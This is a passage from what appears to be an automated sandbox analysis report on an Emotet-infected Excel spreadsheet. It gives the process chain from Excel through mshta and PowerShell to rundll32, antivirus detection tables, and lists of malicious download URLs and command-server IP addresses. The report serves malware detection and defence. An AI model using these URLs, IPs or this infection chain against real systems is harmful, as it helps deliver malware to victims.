                            Rundll32                            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562403 Sample: imedpub_6.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 49 129.232.188.93 xneeloZA South Africa 2->49 51 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->51 53 42 other IPs or domains 2->53 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Multi AV Scanner detection for domain / URL 2->65 67 Found malware configuration 2->67 69 16 other signatures 2->69 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 47 C:\Users\user\Desktop\imedpub_6.xls, Composite 15->47 dropped 18 cmd.exe 15->18         started        process6 process7 20 mshta.exe 11 18->20         started        dnsIp8 55 91.240.118.172, 49167, 49168, 80 GLOBALLAYERNL unknown 20->55 23 powershell.exe 12 7 20->23         started        process9 dnsIp10 57 hostfeeling.com 164.90.147.135, 80 DIGITALOCEAN-ASNUS United States 23->57 59 jurnalpjf.lan.go.id 103.206.244.105, 49170, 80 CEPATNET-AS-IDPTMoraTelematikaIndonesiaID Indonesia 23->59 45 C:\ProgramData\JooSee.dll, PE32 23->45 dropped 73 Powershell drops PE file 23->73 28 cmd.exe 23->28         started        file11 signatures12 process13 process14 30 rundll32.exe 28->30         started        process15 32 rundll32.exe 1 30->32         started        file16 43 C:\Windows\...\xjvfkwqtmalp.bjg (copy), PE32 32->43 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->61 36 rundll32.exe 32->36         started        signatures17 process18 process19 38 rundll32.exe 1 36->38         started        signatures20 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->71 41 rundll32.exe 38->41         started        process21

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            imedpub_6.xls19%ReversingLabsDocument-Excel.Trojan.Emotet

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\ProgramData\JooSee.dll100%Joe Sandbox ML

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
                            15.2.rundll32.exe.340000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2430000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2820000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2420000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.620000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.3b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2ef0000.12.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.1c0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2820000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2ec0000.11.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.190000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.27b0000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2d30000.20.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2c80000.18.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.ac0000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.330000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.bd0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2f40000.24.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2f60000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2f70000.25.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2700000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.4a0000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.1f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2830000.16.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2fc0000.14.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2e80000.22.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.280000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2d00000.19.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.25b0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2630000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.3080000.29.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.7f0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.180000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.200000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.20f0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            11.2.rundll32.exe.350000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2660000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.270000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2e00000.21.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2400000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.820000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2eb0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2fa0000.26.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.3050000.28.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2e90000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2f60000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2740000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2860000.17.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.ba0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2e60000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.430000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.28a0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2f10000.23.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.3020000.27.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.27d0000.14.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.3100000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.610000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2800000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2780000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2c0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.460000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.3030000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                            Domains

                            SourceDetectionScannerLabelLink
                            hostfeeling.com11%VirustotalBrowse
                            jurnalpjf.lan.go.id1%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
                            http://maxtdeveloper.com/okw9yx/100%Avira URL Cloudmalware
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/100%Avira URL Cloudmalware
                            http://it-o.biz/bitrix/xoDdDe/PE3100%Avira URL Cloudmalware
                            http://www.inablr.com/elenctic/f100%Avira URL Cloudmalware
                            http://totalplaytuxtla.com/sitio/DgktL3zd/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.html:0%Avira URL Cloudsafe
                            http://ocsp.entrust.net030%URL Reputationsafe
                            http://hostfeeling.com/wp-admin/100%Avira URL Cloudmalware
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3100%Avira URL Cloudmalware
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                            https://property-eg.com/mlzkir/97v/100%Avira URL Cloudmalware
                            http://91.240.110%URL Reputationsafe
                            http://91.240.118.172/gg/ff/fe.png100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.pngPE30%Avira URL Cloudsafe
                            http://jurnalpjf.lan.go.id/asset0%Avira URL Cloudsafe
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3100%Avira URL Cloudmalware
                            http://bimesarayenovin.ir/wp-adm100%Avira URL Cloudmalware
                            http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/100%Avira URL Cloudmalware
                            https://160.16.102.168:80/SoFzpWBFIEFVoCFQgg0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html0%Avira URL Cloudsafe
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.html~0%Avira URL Cloudsafe
                            http://ocsp.entrust.net0D0%URL Reputationsafe
                            http://hostfeeling.com100%Avira URL Cloudmalware
                            http://daisy.sukoburu-secure.com100%Avira URL Cloudmalware
                            http://it-o.biz/0%Avira URL Cloudsafe
                            http://jurnalpjf.lan.go.id/assets/iM/100%Avira URL Cloudmalware
                            http://activetraining.sytes.net/100%Avira URL Cloudmalware
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3100%Avira URL Cloudmalware
                            https://gudangtasorichina.com/wp-content/GG01c/PE3100%Avira URL Cloudmalware
                            https://gudangtasorichina.com/wp0%Avira URL Cloudsafe
                            http://daisy.suk0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlngs0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlmshta0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlWinSta00%Avira URL Cloudsafe
                            http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3100%Avira URL Cloudmalware
                            https://property-eg.com/mlzkir/97v/PE3100%Avira URL Cloudmalware
                            http://daisy.sukoburu-secure.com/8plks/v8lyZTe/100%Avira URL Cloudmalware
                            https://property-eg.com/mlzkir/9100%Avira URL Cloudmalware
                            http://91.240.118.1720%Avira URL Cloudsafe
                            https://160.16.102.168/0%Avira URL Cloudsafe
                            http://jurnalpjf.lan.go.id0%Avira URL Cloudsafe
                            http://www.protware.com0%URL Reputationsafe
                            http://activetraining.sytes.net/libraries/8s/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.htmlfunction0%Avira URL Cloudsafe
                            http://totalplaytuxtla.com/sitio0%Avira URL Cloudsafe
                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/100%Avira URL Cloudmalware
                            http://it-o.biz/bitrix/xoDdDe/100%Avira URL Cloudmalware
                            https://gudangtasorichina.com/wp-content/GG01c/100%Avira URL Cloudmalware
                            http://totalplaytuxtla.com/sitio/DgktL3zd/100%Avira URL Cloudmalware
                            http://activetraining.sytes.net/libraries/8s/100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.p0%Avira URL Cloudsafe
                            http://gardeningfilm.com/wp-cont100%Avira URL Cloudmalware
                            http://jurnalpjf.lan.go.id/assets/iM/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.htmlB0%Avira URL Cloudsafe
                            http://ja.com/0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlC0%Avira URL Cloudsafe
                            http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3100%Avira URL Cloudmalware
                            http://bimesarayenovin.ir/wp-admin/G1pYGL/100%Avira URL Cloudmalware
                            https://160.16.102.168/30%Avira URL Cloudsafe
                            http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.html100%Avira URL Cloudmalware

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            hostfeeling.com
                            		164.90.147.135
                            		truetrueunknown
                            jurnalpjf.lan.go.id
                            		103.206.244.105
                            		truefalseunknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://91.240.118.172/gg/ff/fe.pngtrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://jurnalpjf.lan.go.id/assets/iM/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmltrue
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://maxtdeveloper.com/okw9yx/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://it-o.biz/bitrix/xoDdDe/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.inablr.com/elenctic/fpowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://totalplaytuxtla.com/sitio/DgktL3zd/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/gg/ff/fe.html:mshta.exe, 00000004.00000003.419116889.0000000000380000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://ocsp.entrust.net03rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://hostfeeling.com/wp-admin/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.diginotar.nl/cps/pkioverheid0rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://property-eg.com/mlzkir/97v/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.11powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            		low
                            http://91.240.118.172/gg/ff/fe.pngPE3powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://jurnalpjf.lan.go.id/assetpowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://bimesarayenovin.ir/wp-admpowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://160.16.102.168:80/SoFzpWBFIEFVoCFQggrundll32.exe, 0000000F.00000002.673084051.000000000057A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.htmlmshta.exe, 00000004.00000003.420332765.0000000002AC5000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/gg/ff/fe.html~mshta.exe, 00000004.00000002.434786060.000000000033E000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://ocsp.entrust.net0Drundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://hostfeeling.compowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://daisy.sukoburu-secure.compowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://it-o.biz/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://activetraining.sytes.net/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://gudangtasorichina.com/wp-content/GG01c/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://crl.entrust.net/server1.crl0rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://gudangtasorichina.com/wppowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://daisy.sukpowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.240.118.172/gg/ff/fe.htmlngsmshta.exe, 00000004.00000002.434786060.000000000033E000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.240.118.172/gg/ff/fe.htmlmshtamshta.exe, 00000004.00000002.434771274.0000000000300000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.240.118.172/gg/ff/fe.htmlWinSta0mshta.exe, 00000004.00000002.434771274.0000000000300000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://property-eg.com/mlzkir/97v/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://daisy.sukoburu-secure.com/8plks/v8lyZTe/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://property-eg.com/mlzkir/9powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.172powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://160.16.102.168/rundll32.exe, 0000000F.00000002.673152455.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://jurnalpjf.lan.go.idpowershell.exe, 00000006.00000002.677598508.00000000038AA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.protware.commshta.exe, 00000004.00000003.419178772.00000000003DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.434882434.00000000003DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.435386261.0000000003CAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.433698819.00000000003DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.435368888.0000000003C92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.433744661.0000000003C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419492395.0000000003CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://activetraining.sytes.net/libraries/8s/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.172/gg/ff/fe.htmlfunctionmshta.exe, 00000004.00000003.420573882.0000000002ACD000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://totalplaytuxtla.com/sitiopowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://maxtdeveloper.com/okw9yx/Gc28ZX/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://it-o.biz/bitrix/xoDdDe/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://gudangtasorichina.com/wp-content/GG01c/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://totalplaytuxtla.com/sitio/DgktL3zd/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://activetraining.sytes.net/libraries/8s/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.172/gg/ff/fe.ppowershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://gardeningfilm.com/wp-contpowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://jurnalpjf.lan.go.id/assets/iM/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.172/gg/ff/fe.htmlBimedpub_6.xls.0.drtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://ja.com/powershell.exe, 00000006.00000002.672127760.00000000001D0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.240.118.172/gg/ff/fe.htmlCmshta.exe, 00000004.00000002.434786060.000000000033E000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://bimesarayenovin.ir/wp-admin/G1pYGL/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://secure.comodo.com/CPS0rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://160.16.102.168/3rundll32.exe, 0000000F.00000002.673152455.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.entrust.net/2048ca.crl0rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  195.154.133.20
                                  		unknownFrance
                                  		12876OnlineSASFRtrue
                                  185.157.82.211
                                  		unknownPoland
                                  		42927S-NET-ASPLtrue
                                  212.237.17.99
                                  		unknownItaly
                                  		31034ARUBA-ASNITtrue
                                  79.172.212.216
                                  		unknownHungary
                                  		61998SZERVERPLEXHUtrue
                                  110.232.117.186
                                  		unknownAustralia
                                  		56038RACKCORP-APRackCorpAUtrue
                                  173.214.173.220
                                  		unknownUnited States
                                  		19318IS-AS-1UStrue
                                  212.24.98.99
                                  		unknownLithuania
                                  		62282RACKRAYUABRakrejusLTtrue
                                  138.185.72.26
                                  		unknownBrazil
                                  		264343EmpasoftLtdaMeBRtrue
                                  178.63.25.185
                                  		unknownGermany
                                  		24940HETZNER-ASDEtrue
                                  160.16.102.168
                                  		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                  81.0.236.90
                                  		unknownCzech Republic
                                  		15685CASABLANCA-ASInternetCollocationProviderCZtrue
                                  103.75.201.2
                                  		unknownThailand
                                  		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                                  216.158.226.206
                                  		unknownUnited States
                                  		19318IS-AS-1UStrue
                                  45.118.115.99
                                  		unknownIndonesia
                                  		131717IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaIDtrue
                                  51.15.4.22
                                  		unknownFrance
                                  		12876OnlineSASFRtrue
                                  159.89.230.105
                                  		unknownUnited States
                                  		14061DIGITALOCEAN-ASNUStrue
                                  162.214.50.39
                                  		unknownUnited States
                                  		46606UNIFIEDLAYER-AS-1UStrue
                                  103.206.244.105
                                  		jurnalpjf.lan.go.idIndonesia
                                  		131111CEPATNET-AS-IDPTMoraTelematikaIndonesiaIDfalse
                                  200.17.134.35
                                  		unknownBrazil
                                  		1916AssociacaoRedeNacionaldeEnsinoePesquisaBRtrue
                                  217.182.143.207
                                  		unknownFrance
                                  		16276OVHFRtrue
                                  107.182.225.142
                                  		unknownUnited States
                                  		32780HOSTINGSERVICES-INCUStrue
                                  51.38.71.0
